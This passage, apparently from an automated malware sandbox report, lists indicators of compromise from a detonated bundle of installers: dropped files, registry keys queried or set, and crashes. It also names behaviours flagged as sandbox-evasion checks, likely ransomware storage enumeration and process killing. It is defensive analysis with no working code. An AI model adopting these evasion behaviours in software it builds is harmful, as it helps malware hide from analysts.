Files\unins.vbs Full Program Features.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-0F49K.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-LPRJ0.tmp vpn.tmp File created C:\Program Files\dcpr.dll guihuali-game.exe File created C:\Program Files (x86)\Picture Lab\is-COT04.tmp prolab.tmp File created C:\Program Files (x86)\I-record\is-PSJ5B.tmp irecord.tmp File created C:\Program Files (x86)\Install engine 16\is-EGGDL.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\viewerise\is-MPIIL.tmp vict.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\Microsoft.NET\Kybysaluke.exe ppppppfy.exe File created C:\Program Files (x86)\Picture Lab\is-O2TJE.tmp prolab.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d jg7_7wjg.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-S4C5K.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-4518C.tmp vpn.tmp File created C:\Program Files\javcse\install.vbs 22.exe File created C:\Program Files (x86)\MaskVPN\is-JAH5F.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-BIN9V.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-U81UG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe Setup.exe File created C:\Program Files (x86)\I-record\is-RVV26.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-6C4MP.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-GIBMH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-S6EGA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9TFE9.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IQHV5.tmp vpn.tmp File created C:\Program Files (x86)\Microsoft.NET\Kuxefedype.exe Microsoft.exe File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File created C:\Program Files (x86)\I-record\is-AO5DE.tmp irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-MV26G.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll irecord.tmp -
Drops file in Windows directory 37 IoCs
Processes:
msiexec.exeWerFault.exeDrvInst.exesvchost.exesvchost.exeDrvInst.exemultitimer.exeaipackagechainer.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeexpand.exetapinstall.exedescription ioc process File opened for modification C:\Windows\Installer\MSI9E84.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI28D2.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File opened for modification C:\Windows\Installer\f75dea9.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA0E6.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\Installer\f75dea9.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIA26E.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSIC6C9.tmp msiexec.exe File created C:\Windows\Tasks\.job aipackagechainer.exe File opened for modification C:\Windows\Installer\MSI2DB6.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI5C79.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI57C5.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSIA667.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB974.tmp msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\MSI684.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2B06.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5896 4240 WerFault.exe RunWW.exe 4620 4240 WerFault.exe RunWW.exe 7172 4240 WerFault.exe RunWW.exe 7500 4240 WerFault.exe RunWW.exe 3948 4240 WerFault.exe RunWW.exe 7804 4240 WerFault.exe RunWW.exe 3816 4240 WerFault.exe RunWW.exe 7736 4240 WerFault.exe RunWW.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exeDrvInst.exetapinstall.exeDrvInst.exetapinstall.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
QJXVwuoxW.exesvchost.exe5768.tmp.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString QJXVwuoxW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5768.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5768.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 QJXVwuoxW.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3428 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4760 taskkill.exe 1972 taskkill.exe 6040 taskkill.exe 8096 taskkill.exe -
Processes:
browser_broker.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exeDrvInst.exesvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-491 = "India Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-492 = "India Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 